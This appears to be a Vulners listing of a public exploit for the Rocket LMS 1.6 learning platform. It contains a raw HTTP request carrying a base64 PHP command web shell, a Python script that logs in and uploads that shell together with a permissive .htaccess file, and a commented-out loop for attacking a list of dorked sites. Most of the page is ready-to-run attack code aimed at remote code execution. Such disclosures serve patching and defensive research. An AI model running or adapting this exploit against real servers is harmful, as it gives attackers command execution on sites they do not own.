Vulners
Lucene search
Rocket LMS 1.6 Shell Upload Vulnerability
# Exploit Title: Rocket LMS - Learning Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Version: Version 1.6
# Tested on Ubuntu 18.04
base64 encode your payload
after data image write your extension
upload
-----
There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.
Enjoy!
-------Request-----------
POST /panel/setting HTTP/1.1
Host: localhost
Content-Length: 214
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/panel/setting/step/2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D
Connection: close
_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==
&cover_img=%2Fstore%2F995%2F7.jpg
Exploit:
import time
import requests
import base64
import re
import traceback
class Rocket:
def __init__(self,ssl,host,port,email,password,file):
self._url_to_upload = "/panel/setting"
self._url_to_login = "/login"
self.host = host
self.port = port
self.ssl = ssl
self.email = email
self.password = password
self.file = file
def get_csrf_token(self,client,URL):
fromt = client.get(URL)
if 'XSRF-TOKEN' in client.cookies:
csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]
return csrftoken
else:
print("Error while fetching token")
return
def login(self):
client = requests.session()
if self.ssl == True:
ssl= "https://"
else:
ssl= "http://"
URL = str(ssl+self.host+":"+self.port+self._url_to_login)
URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)
csrftoken = self.get_csrf_token(client,URL)
fromt = client.get(URL) # sets cookie
login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')
r = client.post(URL, data=login_data, cookies=client.cookies)
self.upload_shell(client,URL2)
self.upload_htaccess(client,URL2)
def upload_shell(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
with open(self.file,"r") as payload:
to_base64 = payload.read()
to_base64 = str(to_base64).encode("utf-8")
base64_encoded_data= base64.b64encode(to_base64)
base64_encoded_data = str(base64_encoded_data)[:-1]
base64_encoded_data = str(base64_encoded_data)[2:]
string = "data:image/php;base64,"+str(base64_encoded_data)
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print("sent and uploaded shell :"+URL+"\n")
else:
print("couldn't upload shell")
def upload_htaccess(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print("sent and uploaded htaccess:"+URL+"\n")
print("Go and rename file in filemanager on website")
else:
print("couldn't upload htaccess")
elon = Rocket(True,"localhost","443","[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")
elon.login()
#with dork
# try:
# with open("sites.txt","r") as urls:
# url = urls.readlines()
# ssl = True
# port = 443
# for line in url:
# try:
# if "sslyok" in line:
# port = 80
# ssl = False
# line = str(line.rstrip('%0a'))
# print("trying:"+line)
# elon = Rocket(ssl,line.rstrip("\n"),str(port),"[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")
# elon.login()
# time.sleep(1)
# except Exception:
# #traceback.print_exc()
# print("atamadim")
# finally:
# print("okey")
# except Exception:
# print("atamadim")
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Sep 2022 00:00Current